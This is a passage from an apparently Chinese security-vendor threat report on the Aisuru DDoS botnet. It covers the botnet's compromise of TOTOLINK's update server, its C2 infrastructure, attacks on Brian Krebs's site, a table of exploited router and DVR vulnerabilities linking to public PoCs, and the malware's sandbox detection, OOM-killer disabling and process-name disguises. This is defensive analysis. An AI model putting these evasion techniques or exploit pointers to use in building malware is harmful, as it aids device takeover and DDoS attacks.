<p>&#x76EE;&#x524D;totolink&#x5347;&#x7EA7;&#x670D;&#x52A1;&#x5668;&#x7684;&#x6F0F;&#x6D1E;&#x5DF2;&#x88AB;&#x4FEE;&#x8865;&#xFF0C;AIRUSU&#x56E2;&#x4F19;&#x4E5F;&#x5E7D;&#x9ED8;&#x7684;&#x8868;&#x793A;<code>RIP TOTOLINK 2025-2025</code>&#xFF0C;&#x4F46;&#x5176;&#x5B9E;AIRUSU&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x89C4;&#x6A21;&#x5E76;&#x672A;&#x88AB;&#x5F71;&#x54CD;&#xFF0C;&#x4F9D;&#x7136;&#x4FDD;&#x6301;&#x5728;30&#x4E07;&#x5DE6;&#x53F3;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_patch.png" alt="aisuru_patch.png" loading="lazy"></p>
<p>&#x5728;2025&#x5E74;9&#x6708;&#x521B;&#x8BB0;&#x5F55;&#x7684;12.1 Tbps&#x4E4B;&#x524D;&#xFF0C;Aisuru&#x505A;&#x8FC7;&#x6570;&#x6B21;&#x653B;&#x51FB;&#x6D4B;&#x8BD5;&#xFF0C;&#x5305;&#x62EC;&#x5BF9;&#x77E5;&#x540D;&#x8BB0;&#x8005;Brian Krebs&#x4E2A;&#x4EBA;&#x7F51;&#x7AD9;&#x7684;&#x653B;&#x51FB;&#xFF0C;&#x653B;&#x51FB;&#x6D41;&#x91CF;&#x5747;&#x521B;&#x9020;&#x4E86;&#x5F53;&#x65F6;&#x7684;&#x201C;&#x4E16;&#x754C;&#x8BB0;&#x5F55;&#x201D;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_talk.png" alt="aisuru_talk.png" loading="lazy"></p>
<p>&#x6709;&#x610F;&#x601D;&#x7684;&#x662F;&#x201C;Ethan J Foltz&#x201D;&#x662F;Rapper Botnet&#x7684;&#x4F5C;&#x8005;&#x7684;&#x771F;&#x540D;&#xFF0C;&#x4ED6;&#x4E8E;2025&#x5E74;8&#x6708;6&#x65E5;&#x88AB;&#x6355;&#xFF1B;&#x800C;&#x4E0A;&#x56FE;&#x4E2D;&#x201C;Ethan J Foltz&#x201D;&#x8FD9;&#x4E2A;ID&#x80CC;&#x540E;&#x4E4B;&#x4EBA;&#x5176;&#x5B9E;&#x662F;Snow&#xFF0C;&#x4ED6;&#x4F7F;&#x7528;&#x8FD9;&#x79CD;&#x65B9;&#x5F0F;&#x8D64;&#x88F8;&#x88F8;&#x7684;&#x5632;&#x8BBD;Rapperbot&#xFF0C;&#x8FD9;&#x6216;&#x8BB8;&#x662F;AISURU&#x56E2;&#x4F19;&#x5728;DDoS&#x5708;&#x4EBA;&#x4EBA;&#x558A;&#x6253;&#x7684;&#x539F;&#x56E0;&#x4E4B;&#x4E00;&#x3002;</p>
<h3 id="xlab%E8%A7%86%E9%87%8E">XLab&#x89C6;&#x91CE;</h3>
<p>&#x5BF9;&#x4E8E;&#x533F;&#x540D;&#x6D88;&#x606F;&#x6E90;&#x63D0;&#x4F9B;&#x7684;&#x6545;&#x4E8B;&#xFF0C;&#x8BFB;&#x8005;&#x80AF;&#x5B9A;&#x4F1A;&#x6709;&#x7C7B;&#x4F3C;&#x7684;&#x60F3;&#x6CD5;&#xFF1A;<code>&#x201C;&#x8FD9;&#x7684;&#x786E;&#x662F;&#x5F88;&#x6709;&#x8DA3;&#x7684;&#x74DC;&#xFF0C;&#x53EF;&#x4F60;&#x8FD9;&#x74DC;&#x4FDD;&#x719F;&#x4E0D;&#xFF1F;&#x201D;</code>&#x6211;&#x4EEC;&#x6216;&#x8BB8;&#x65E0;&#x6CD5;&#x9A8C;&#x8BC1;&#x8FD9;&#x4E9B;&#x4EBA;&#x7269;&#xFF0C;&#x4F46;&#x4F9D;&#x6258;&#x4E8E;XLab&#x5927;&#x7F51;&#x5A01;&#x80C1;&#x611F;&#x77E5;&#x7CFB;&#x7EDF;&#x5F3A;&#x5927;&#x7684;&#x76D1;&#x6D4B;&#x80FD;&#x529B;&#xFF0C;&#x6211;&#x4EEC;&#x5BF9;<code>&#x6837;&#x672C;&#xFF0C;C2&#xFF0C;&#x653B;&#x51FB;&#x4E8B;&#x4EF6;</code>&#x5747;&#x6709;&#x826F;&#x597D;&#x7684;&#x89C6;&#x91CE;&#x3002;&#x4EE5;&#x8BE5;&#x56E2;&#x4F19;&#x7684;&#x6570;&#x6B21;&#x5173;&#x952E;&#x6D3B;&#x52A8;&#x4E3A;&#x7EBF;&#x7D22;&#xFF0C;&#x901A;&#x8FC7;&#x6570;&#x636E;&#x4EA4;&#x53C9;&#x6BD4;&#x5BF9;&#xFF0C;<strong>&#x6211;&#x4EEC;&#x8BA4;&#x4E3A;&#x533F;&#x540D;&#x6D88;&#x606F;&#x6E90;&#x63D0;&#x4F9B;&#x7684;&#x653B;&#x51FB;&#x4E8B;&#x4EF6;&#x60C5;&#x62A5;&#x5177;&#x6709;&#x8F83;&#x9AD8;&#x7684;&#x53EF;&#x4FE1;&#x5EA6;</strong>&#x3002;</p>
<h4 id="1%EF%BC%9A2025%E5%B9%B44%E6%9C%88%E5%90%91totolink%E5%8D%87%E7%BA%A7%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%A4%8D%E5%85%A5%E7%9A%84%E6%81%B6%E6%84%8F%E8%84%9A%E6%9C%ACtsh">1&#xFF1A;2025&#x5E74;4&#x6708;&#x5411;totolink&#x5347;&#x7EA7;&#x670D;&#x52A1;&#x5668;&#x690D;&#x5165;&#x7684;&#x6076;&#x610F;&#x811A;&#x672C;t.sh</h4>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_download.png" alt="aisuru_download.png" loading="lazy"><br>
&#x4ECE;26&#x65E5;&#x8D77;&#xFF0C;&#x811A;&#x672C;&#x5F00;&#x59CB;&#x4F7F;&#x7528;&#x4E00;&#x4E2A;&#x57DF;&#x540D;updatetoto.tw&#xFF0C;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;<a href="https://tranco-list.eu/?ref=blog.xlab.qianxin.com">&#x57DF;&#x540D;&#x6392;&#x540D;&#x7CFB;&#x7EDF;Tranco</a>&#x6765;&#x8861;&#x91CF;&#x5B83;&#x7684;&#x6D3B;&#x8DC3;&#x7A0B;&#x5E8F;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_tranco.png" alt="aisuru_tranco.png" loading="lazy"></p>
<p>&#x4EE5;4&#x6708;29&#x65E5;&#x5230;5&#x6708;30&#x65E5;&#x7684;&#x6392;&#x540D;&#x4E3A;&#x4F8B;&#xFF0C;updatetoto.tw&#x8FD9;&#x4E2A;&#x4E8E;4&#x6708;25&#x65E5;&#x624D;&#x521B;&#x5EFA;&#x7684;Downloader&#x57DF;&#x540D;&#x5728;&#x77ED;&#x77ED;&#x7684;&#x4E00;&#x4E2A;&#x6708;&#x5185;&#x5C31;&#x5728;&#x5168;&#x7403;&#x57DF;&#x540D;&#x4E2D;&#x6392;&#x5230;&#x4E86;672588&#xFF0C;&#x8BC1;&#x660E;AISURU&#x56E2;&#x4F19;&#x8FD9;&#x6B21;&#x7684;&#x611F;&#x67D3;&#x6D3B;&#x52A8;&#x975E;&#x5E38;&#x6210;&#x529F;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_rank.png" alt="aisuru_rank.png" loading="lazy"></p>
<h4 id="2%EF%BC%9A2025%E5%B9%B44%E6%9C%88%E5%BC%80%E5%90%AFgre-tunnel%E7%9A%84c2-ip">2&#xFF1A;2025&#x5E74;4&#x6708;&#x5F00;&#x542F;GRE TUNNEL&#x7684;C2 IP</h4>
<p>Aisuru&#x56E2;&#x4F19;&#x5728;151.242.2.[22 - 25]&#x8FD9;4&#x4E2A;IP &#x914D;&#x7F6E;GRE Tunnel&#xFF0C;&#x5B83;&#x4EEC;&#x89D2;&#x8272;&#x5176;&#x5B9E;&#x662F;C2&#x670D;&#x52A1;&#x5668;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_gre.png" alt="aisuru_gre.png" loading="lazy"></p>
<p>&#x800C;&#x6211;&#x4EEC;&#x5728;4&#x6708;&#x4EFD;&#x6355;&#x83B7;&#x7684;C2 <code>approach.ilovegaysex[.]su</code>&#x7684;TXT&#x8BB0;&#x5F55;&#x89E3;&#x5BC6;&#x540E;&#x6DB5;&#x76D6;&#x4E86;&#x8FD9;4&#x4E2A;IP&#xFF0C;&#x8BF4;&#x660E;&#x8FD9;&#x4E2A;C2&#x96B6;&#x5C5E;&#x4E8E;Aisuru&#x56E2;&#x4F19;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_pdns.png" alt="aisuru_pdns.png" loading="lazy"></p>
<h4 id="3%EF%BC%9A2025%E5%B9%B45%E6%9C%88%E5%AF%B9krebsonsecurity%E7%9A%84%E6%94%BB%E5%87%BB">3&#xFF1A;2025&#x5E74;5&#x6708;&#x5BF9;KrebsOnSecurity&#x7684;&#x653B;&#x51FB;</h4>
<p>&#x5BF9;&#x6076;&#x610F;&#x57DF;&#x540D; ilovegaysex &#x6240;&#x5173;&#x8054;&#x7684; C2 &#x670D;&#x52A1;&#x5668;&#x8FDB;&#x884C;&#x6307;&#x4EE4;&#x8DDF;&#x8E2A;&#xFF0C;&#x4ECA;&#x5E74;5&#x6708;&#x76D1;&#x6D4B;&#x5230;&#x5176;&#x9488;&#x5BF9;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x8C03;&#x67E5;&#x8BB0;&#x8005; Brian Krebs &#x7684;&#x4E2A;&#x4EBA;&#x535A;&#x5BA2;&#x53D1;&#x8D77;&#x4E86;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_kreb.png" alt="aisuru_kreb.png" loading="lazy"></p>
<h4 id="4%EF%BC%9A2025%E5%B9%B49%E6%9C%88%E5%AF%B918521178117%E7%9A%84%E6%94%BB%E5%87%BB">4&#xFF1A;2025&#x5E74;9&#x6708;&#x5BF9;185.211.78.117&#x7684;&#x653B;&#x51FB;</h4>
<p>&#x5BF9;&#x6076;&#x610F;&#x57DF;&#x540D; ilovegaysex &#x6240;&#x5173;&#x8054;&#x7684; C2 &#x670D;&#x52A1;&#x5668;&#x8FDB;&#x884C;&#x6307;&#x4EE4;&#x8DDF;&#x8E2A;&#xFF0C;&#x4ECA;&#x5E74;9&#x6708;&#x76D1;&#x6D4B;&#x5230;&#x5BF9;185.211.78.117&#x53D1;&#x8D77;&#x4E86;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#xFF0C;&#x6D41;&#x91CF;&#x662F;&#x60CA;&#x4EBA;&#x7684;11.5 Tbps&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_attack.png" alt="aisuru_attack.png" loading="lazy"></p>
<h2 id="%E6%A0%B7%E6%9C%AC%E4%BC%A0%E6%92%AD">&#x6837;&#x672C;&#x4F20;&#x64AD;</h2>
<p>&#x4F9D;&#x6258;&#x4E8E;XLab&#x5927;&#x7F51;&#x5A01;&#x80C1;&#x611F;&#x77E5;&#x7CFB;&#x7EDF;&#x7684;&#x80FD;&#x529B;&#xFF0C;&#x6211;&#x4EEC;&#x89C2;&#x5BDF;&#x5230;Aisuru&#x6837;&#x672C;&#x6700;&#x8FD1;&#x4E3B;&#x8981;&#x901A;&#x8FC7;NDAY&#x6F0F;&#x6D1E;&#x4F20;&#x64AD;&#xFF0C;&#x540C;&#x65F6;&#x5177;&#x5907;0DAY&#x6F0F;&#x6D1E;&#x7684;&#x5229;&#x7528;&#x80FD;&#x529B;&#x3002;&#x53BB;&#x5E74;6&#x6708;&#x5F00;&#x59CB;&#x4F7F;&#x7528;&#x7684;&#x7F8E;&#x56FD;Cambium Networks&#x516C;&#x53F8;&#x7684;cnPilot&#x8DEF;&#x7531;&#x5668;0DAY&#x4ECD;&#x7136;&#x5728;&#x5229;&#x7528;&#x3002;Aisuru&#x4F20;&#x64AD;&#x6837;&#x672C;&#x4F7F;&#x7528;&#x7684;&#x90E8;&#x5206;&#x6F0F;&#x6D1E;&#x5982;&#x4E0B;&#xFF1A;</p>
<table>
<thead>
<tr>
<th>Vulnerability</th>
<th>Affected Vendor</th>
<th>Affected Devices</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://a-mtk.com/wp-content/uploads/2015/06/Common-CGI-command-EN-20150331.pdf?ref=blog.xlab.qianxin.com">AMTK-CAMERA-CMD-RCE</a></td>
<td>A-MTK</td>
<td>Camera</td>
</tr>
<tr>
<td><a href="https://www.exploit-db.com/exploits/25138?ref=blog.xlab.qianxin.com">CVE-2013-1599</a></td>
<td>D-Link</td>
<td>DCS-3411 Firmware</td>
</tr>
<tr>
<td><a href="http://www.s3cur1ty.de/m1adv2013-004?ref=blog.xlab.qianxin.com">CVE-2013-3307</a></td>
<td>Linksys</td>
<td>Linksys X3000</td>
</tr>
<tr>
<td><a href="https://www.exploit-db.com/exploits/25998?ref=blog.xlab.qianxin.com">CVE-2013-5948</a></td>
<td>T-Mobile</td>
<td>Tm-Ac1900</td>
</tr>
<tr>
<td><a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb?ref=blog.xlab.qianxin.com">CVE-2017-5259</a></td>
<td>Cambiumnetworks</td>
<td>Cnpilot R190V Firmware</td>
</tr>
<tr>
<td><a href="https://packetstormsecurity.com/files/170366/Nexxt-Router-Firmware-42.103.1.5095-Remote-Code-Execution.html?ref=blog.xlab.qianxin.com">CVE-2022-44149</a></td>
<td>Nexxt</td>
<td>Router</td>
</tr>
<tr>
<td><a href="https://raw.githubusercontent.com/BenHays142/CVE-2023-28771-PoC/main/CVE-2023-28771-poc.py?ref=blog.xlab.qianxin.com">CVE-2023-28771</a></td>
<td>Zyxel,Zyxel,Zyxel,Zyxel</td>
<td>Zyxel ATP,Zyxel USG FLEX,Zyxel VPN,Zyxel ZyWALL/USG</td>
</tr>
<tr>
<td><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2023-1899?ref=blog.xlab.qianxin.com">CVE-2023-50381</a></td>
<td>Realtek</td>
<td>rtl819x Jungle SDK v3.4.11</td>
</tr>
<tr>
<td><a href="https://blog.netlab.360.com/multiple-botnets-are-spreading-using-lilin-dvr-0-day/?ref=blog.xlab.qianxin.com">LILIN-DVR-RCE</a></td>
<td>LILIN</td>
<td>DVR</td>
</tr>
<tr>
<td><a href="https://blog.nicter.jp/2022/10/analysis-of-ddos-bot-targeting-dvrs/?ref=blog.xlab.qianxin.com#fn:1">CVE-2022-35733</a></td>
<td>UNIMO</td>
<td>DVR UDR-JA1004/JA1008/JA101</td>
</tr>
<tr>
<td><a href="https://github.com/netsecfish/tbk_dvr_command_injection?ref=blog.xlab.qianxin.com">CVE-2024-3721</a></td>
<td>TBK</td>
<td>DVR</td>
</tr>
<tr>
<td>CNPILOT-0DAY-RCE</td>
<td>Cambium Networks</td>
<td>cnPilot</td>
</tr>
<tr>
<td><a href="https://github.com/wy876/POC/blob/main/%E4%B8%89%E6%B1%87%E7%BD%91%E5%85%B3%E7%AE%A1%E7%90%86%E8%BD%AF%E4%BB%B6/%E4%B8%89%E6%B1%87%E7%BD%91%E5%85%B3%E7%AE%A1%E7%90%86%E8%BD%AF%E4%BB%B6debug.php%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?ref=blog.xlab.qianxin.com">SANHUI-GATEWAY-DEBUG-PHP-RCE</a></td>
<td>&#x4E09;&#x6C47;</td>
<td>&#x7F51;&#x5173;&#x7BA1;&#x7406;&#x8F6F;&#x4EF6;</td>
</tr>
<tr>
<td><a href="https://github.com/mcw0/PoC/blob/master/TVT-PoC.py?ref=blog.xlab.qianxin.com">TVT-OEM-API-RCE</a></td>
<td>Shenzhen TVT</td>
<td>DVR</td>
</tr>
</tbody>
</table>
<h2 id="%E6%94%BB%E5%87%BB%E7%BB%9F%E8%AE%A1">&#x653B;&#x51FB;&#x7EDF;&#x8BA1;</h2>
<p>Aisuru&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x653B;&#x51FB;&#x76EE;&#x6807;&#x904D;&#x5E03;&#x5168;&#x7403;&#xFF0C;&#x5206;&#x5E03;&#x5728;&#x5404;&#x4E2A;&#x884C;&#x4E1A;&#xFF0C;&#x4E3B;&#x8981;&#x653B;&#x51FB;&#x76EE;&#x6807;&#x5206;&#x5E03;&#x5728;&#x4E2D;&#x56FD;&#x3001;&#x7F8E;&#x56FD;&#x3001;&#x5FB7;&#x56FD;&#xFF0C;&#x82F1;&#x56FD;&#xFF0C;&#x4E2D;&#x56FD;&#x9999;&#x6E2F;&#x7B49;&#x5730;&#x533A;&#x3002;&#x5E76;&#x65E0;&#x660E;&#x663E;&#x7684;&#x5F3A;&#x9488;&#x5BF9;&#x6027;&#x3002;&#x6BCF;&#x65E5;&#x653B;&#x51FB;&#x76EE;&#x6807;&#x51E0;&#x767E;&#x4E2A;&#x5DE6;&#x53F3;&#x3002;</p>
<p>DDoS&#x653B;&#x51FB;&#x8D8B;&#x52BF;&#xFF1A;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/09/AISURU.atk.trends.png" alt="AISURU.atk.trends.png" loading="lazy"></p>
<p>&#x53D7;&#x5BB3;&#x8005;&#x5730;&#x533A;&#x5206;&#x5E03;&#xFF1A;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/09/AISURU.atk.d.png" alt="AISURU.atk.d.png" loading="lazy"></p>
<h2 id="%E6%8A%80%E6%9C%AF%E5%88%86%E6%9E%90">&#x6280;&#x672F;&#x5206;&#x6790;</h2>
<p>&#x4ECE;2025&#x5E74;3&#x6708;14&#x65E5;&#x8D77;&#xFF0C;AIRURU&#x56E2;&#x4F19;&#x5F00;&#x59CB;&#x6295;&#x9012;&#x65B0;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x6837;&#x672C;&#xFF0C;&#x548C;&#x76EE;&#x524D;&#x638C;&#x63E1;&#x7684;&#x6E90;&#x7801;&#x8FDB;&#x884C;&#x6BD4;&#x5BF9;&#xFF0C;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x66F4;&#x65B0;&#x4E3B;&#x8981;&#x96C6;&#x4E2D;&#x5728;&#x52A0;&#x5BC6;&#x65B9;&#x5F0F;&#x4E0A;&#xFF0C;&#x622A;&#x6B62;&#x76EE;&#x524D;&#x53D1;&#x73B0;&#x7684;&#x66F4;&#x65B0;&#x53EF;&#x4EE5;&#x5206;&#x6210;&#x4FE9;&#x5927;&#x7248;&#x672C;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_source.png" alt="aisuru_source.png" loading="lazy"></p>
<ol>
<li>
<p>&#x7248;&#x672C;&#x4E00;&#x7684;&#x66F4;&#x65B0;&#x5305;&#x62EC;&#xFF1A;&#x4F7F;&#x7528;ecdh-P256&#x8FDB;&#x884C;&#x5BC6;&#x94A5;&#x4EA4;&#x6362;&#xFF0C;&#x4E4B;&#x540E;&#x751F;&#x6210;&#x5171;&#x4EAB;&#x7684;chacha20&#x5BC6;&#x94A5;&#x5BF9;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x6D88;&#x606F;&#x52A0;&#x5BC6;&#xFF1B;DNS-TXT&#x8BB0;&#x5F55;&#x4E0D;&#x518D;&#x4F7F;&#x7528;base64+chacha20&#x89E3;&#x5BC6;&#xFF0C;&#x4F7F;&#x7528;base64+xor&#x89E3;&#x5BC6;&#xFF1B;&#x65B0;&#x7684;&#x653B;&#x51FB;&#x6307;&#x4EE4;&#x3001;&#x6D88;&#x606F;&#x683C;&#x5F0F;</p>
</li>
<li>
<p>&#x7248;&#x672C;&#x4E8C;&#x7684;&#x66F4;&#x65B0;&#x5305;&#x62EC;&#xFF1A;&#x7CBE;&#x7B80;&#x7F51;&#x7EDC;&#x534F;&#x8BAE;&#xFF0C;&#x5220;&#x9664;ecdh-P256&#x5BC6;&#x94A5;&#x4EA4;&#x6362;&#x8FC7;&#x7A0B;&#xFF0C;&#xFF1B;&#x9B54;&#x6539;xxhash&#x7B97;&#x6CD5;&#x7528;&#x4E8E;&#x9A8C;&#x8BC1;&#x6D88;&#x606F;&#x5B8C;&#x6574;&#x6027;&#xFF1B;&#x9B54;&#x6539;RC4&#x7B97;&#x6CD5;&#x7528;&#x4E8E;&#x89E3;&#x5BC6;&#x6837;&#x672C;&#x5B57;&#x7B26;&#x4E32;&#x548C;&#x901A;&#x4FE1;key&#xFF1B;</p>
</li>
</ol>
<p>&#x7B2C;&#x4E00;&#x4E2A;&#x7248;&#x672C;&#x53EA;&#x6301;&#x7EED;&#x4E86;&#x534A;&#x4E2A;&#x6708;&#x5DE6;&#x53F3;&#x65F6;&#x95F4;&#xFF0C;&#x540E;&#x7EED;&#x4E3B;&#x8981;&#x4F7F;&#x7528;&#x7B2C;&#x4E8C;&#x4E2A;&#x7248;&#x672C;&#x6837;&#x672C;&#x3002;&#x4E0B;&#x6587;&#x4EE5;&#x7248;&#x672C;&#x4E8C;&#x7684;&#x6837;&#x672C;&#x4E3A;&#x4E3B;&#x8981;&#x5206;&#x6790;&#x5BF9;&#x8C61;&#xFF0C;&#x7740;&#x91CD;&#x4ECB;&#x7ECD;Aisuru&#x7684;&#x5BF9;&#x6297;&#x624B;&#x6CD5;&#xFF0C;&#x52A0;&#x5BC6;&#x7B97;&#x6CD5;&#x4EE5;&#x53CA;&#x7F51;&#x7EDC;&#x534F;&#x8BAE;&#x3002;</p>
<h3 id="%E7%8E%AF%E5%A2%83%E6%A3%80%E6%B5%8B">&#x73AF;&#x5883;&#x68C0;&#x6D4B;</h3>
<p>&#x6837;&#x672C;&#x542F;&#x52A8;&#x540E;&#x4F1A;&#x68C0;&#x6D4B;&#x5F53;&#x524D;&#x8FDB;&#x7A0B;&#x547D;&#x4EE4;&#x884C;&#x4E2D;&#x662F;&#x5426;&#x5305;&#x542B;&#x4EE5;&#x4E0B;&#x5B57;&#x7B26;&#x4E32;:</p>
<pre><code>tcpdump
wireshark
tshark
dumpcap
</code></pre>
<p>&#x68C0;&#x67E5;&#x5185;&#x6838;&#x7684;&#x786C;&#x4EF6;&#x6807;&#x8BC6;&#x4FE1;&#x606F;&#x662F;&#x5426;&#x5305;&#x542B;&#x4EE5;&#x4E0B;&#x5B57;&#x7B26;&#x4E32;&#xFF1A;</p>
<pre><code>VMware
VirtualBox
KVM
Microsoft
QEMU
</code></pre>
<p>&#x5982;&#x679C;&#x68C0;&#x67E5;&#x5230;&#x4E0A;&#x8FF0;&#x60C5;&#x51B5;&#xFF0C;&#x5219;&#x7A0B;&#x5E8F;&#x9000;&#x51FA;&#xFF0C;&#x5728;&#x4E00;&#x5B9A;&#x7A0B;&#x5EA6;&#x4E0A;&#x5E72;&#x6270;&#x6837;&#x672C;&#x7684;&#x52A8;&#x6001;&#x5206;&#x6790;</p>
<h3 id="killer%E5%AF%B9%E6%8A%97">Killer&#x5BF9;&#x6297;</h3>
<p>Linux &#x5185;&#x6838;&#x6709;&#x4E00;&#x4E2A; OOM Killer&#xFF08;Out-Of-Memory Killer&#xFF09;&#xFF0C;&#x5F53;&#x7CFB;&#x7EDF;&#x5185;&#x5B58;&#x4E0D;&#x8DB3;&#x65F6;&#xFF0C;&#x5B83;&#x4F1A;&#x6311;&#x9009;&#x4E00;&#x4E9B;&#x8FDB;&#x7A0B;&#x5F3A;&#x5236;&#x7ED3;&#x675F;&#x6765;&#x91CA;&#x653E;&#x5185;&#x5B58;&#x3002;&#x8BE5;&#x6837;&#x672C;&#x901A;&#x8FC7;&#x5728;<code>/proc/self/oom_score_adj</code>&#x5199;&#x5165;<code>-1000</code>&#x6765;&#x7981;&#x7528;&#x8BE5;&#x529F;&#x80FD;&#xFF0C;&#x4EE5;&#x83B7;&#x53D6;&#x5230;&#x66F4;&#x591A;&#x7684;&#x6267;&#x884C;&#x65F6;&#x95F4;&#x3002;</p>
<p>&#x6B63;&#x6240;&#x8C13;&#x7684;&#x540C;&#x884C;&#x662F;&#x51A4;&#x5BB6;&#xFF0C;&#x6BCF;&#x4E2A;Botnet Operator&#x90FD;&#x60F3;&#x72EC;&#x5360;&#x8BBE;&#x5907;&#xFF0C;&#x5BF9;&#x4E8E;&#x8BBE;&#x5907;&#x7684;&#x4E89;&#x593A;&#x975E;&#x5E38;&#x6FC0;&#x70C8;&#xFF0C;&#x4E00;&#x4E2A;&#x8BBE;&#x5907;&#x4ECA;&#x5929;&#x5C5E;&#x4E8E;A&#xFF0C;&#x660E;&#x5929;&#x53C8;&#x88AB;B&#x5165;&#x4FB5;&#x7684;&#x60C5;&#x51B5;&#x5C61;&#x89C1;&#x4E0D;&#x9C9C;&#x3002;&#x6BD4;&#x5982;Aisuru&#x548C;Rapperbot&#x7684;&#x5728;nvms9000&#x8BBE;&#x5907;&#x7684;&#x7ADE;&#x4E89;&#x4E0A;&#x5C31;&#x975E;&#x5E38;&#x767D;&#x70ED;&#x5316;&#xFF0C;&#x5F53;Aisuru&#x505A;&#x4E3A;&#x80DC;&#x5229;&#x65B9;&#x63A5;&#x7BA1;&#x4E86;&#x8BBE;&#x5907;&#x540E;&#xFF0C;&#x90FD;&#x8981;&#x5FCD;&#x4E0D;&#x4F4F;&#x7684;&#x8DF3;&#x51FA;&#x6765;&#x5632;&#x8BBD;Rapperbot&#xFF0C;&#x8D34;&#x8138;&#x5F00;&#x5927;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/aisuru_fight.png" alt="aisuru_fight.png" loading="lazy"></p>
<p>&#x5927;&#x90E8;&#x5206;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x6837;&#x672C;&#x4E3A;&#x4E86;&#x591A;&#x5E73;&#x53F0;&#x517C;&#x5BB9;&#x6027;&#xFF0C;&#x4F7F;&#x7528;&#x9759;&#x6001;&#x94FE;&#x63A5;&#x7F16;&#x8BD1;&#x6837;&#x672C;&#xFF0C;&#x5BFC;&#x81F4;&#x5B83;&#x4EEC;&#x4E0D;&#x4F7F;&#x7528;&#x4EFB;&#x4F55;&#x5171;&#x4EAB;&#x5E93;&#xFF1B;&#x6B64;&#x5916;&#x8FD8;&#x4F1A;&#x5728;&#x8FD0;&#x884C;&#x540E;&#x5220;&#x9664;&#x81EA;&#x8EAB;&#x6587;&#x4EF6;&#x3002;&#x4F46;&#x8FD9;&#x4E5F;&#x8BA9;&#x4E0D;&#x5C11;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5C06;&#x4E0A;&#x8FF0;&#x4F5C;&#x4E3A;&#x7279;&#x5F81;&#x8FDB;&#x884C;<code>kill</code>&#xFF0C;&#x4EE5;&#x51FB;&#x8D25;&#x81EA;&#x5DF1;&#x7684;&#x7ADE;&#x4E89;&#x5BF9;&#x624B;&#x3002;</p>
<p>&#x4E3A;&#x4E86;&#x5BF9;&#x6297;&#x4E0A;&#x8FF0;killer&#xFF0C;&#x6837;&#x672C;&#x542F;&#x52A8;&#x540E;&#x4F1A;&#x5728;<code>/lib/</code>&#x4E2D;&#x641C;&#x7D22;&#x4EE5;<code>.so</code>&#x7ED3;&#x5C3E;&#x7684;&#x5171;&#x4EAB;&#x5E93;&#x6587;&#x4EF6;&#x5E76;&#x6620;&#x5C04;&#x5230;&#x5F53;&#x524D;&#x8FDB;&#x7A0B;&#x4E2D;&#xFF1B;&#x4E0D;&#x5220;&#x9664;&#x6587;&#x4EF6;&#x5E76;&#x5C06;&#x6587;&#x4EF6;&#x540D;&#x66FF;&#x6362;&#x4E3A;<code>libcow.so</code>&#xFF1B;&#x8FDB;&#x7A0B;&#x540D;&#x540C;&#x6837;&#x662F;&#x88AB;&#x68C0;&#x67E5;&#x7684;&#x91CD;&#x70B9;&#x5BF9;&#x8C61;&#xFF0C;&#x6837;&#x672C;&#x5C06;&#x8FDB;&#x7A0B;&#x540D;&#x66FF;&#x6362;&#x4E3A;&#x4EE5;&#x4E0B;&#x5E38;&#x89C1;&#x7684;&#x8FDB;&#x7A0B;&#x540D;&#x4E4B;&#x4E00;&#xFF1A;</p>
<pre><code>telnetd
udhcpc
inetd
ntpclient
watchdog
klogd
upnpd
dhclient
</code></pre>
<h3 id="%E9%AD%94%E6%94%B9%E7%9A%84rc4%E5%8A%A0%E5%AF%86%E7%AE%97%E6%B3%95">&#x9B54;&#x6539;&#x7684;RC4&#x52A0;&#x5BC6;&#x7B97;&#x6CD5;</h3>
<p>&#x548C;&#x4E4B;&#x524D;&#x7684;AIRASHI&#x7248;&#x672C;&#x76F8;&#x6BD4;&#xFF0C;&#x65B0;&#x6837;&#x672C;&#x89E3;&#x5BC6;&#x5B57;&#x7B26;&#x4E32;&#x65F6;&#x4E5F;&#x4E0D;&#x518D;&#x4F7F;&#x7528;&#x6807;&#x51C6;&#x7684;RC4&#x7B97;&#x6CD5;&#xFF0C;&#x6821;&#x9A8C;&#x6D88;&#x606F;&#x65F6;&#x4E0D;&#x518D;&#x4F7F;&#x7528;&#x6807;&#x51C6;&#x7684;HMAC-SHA256&#x7B97;&#x6CD5;&#x3002;</p>
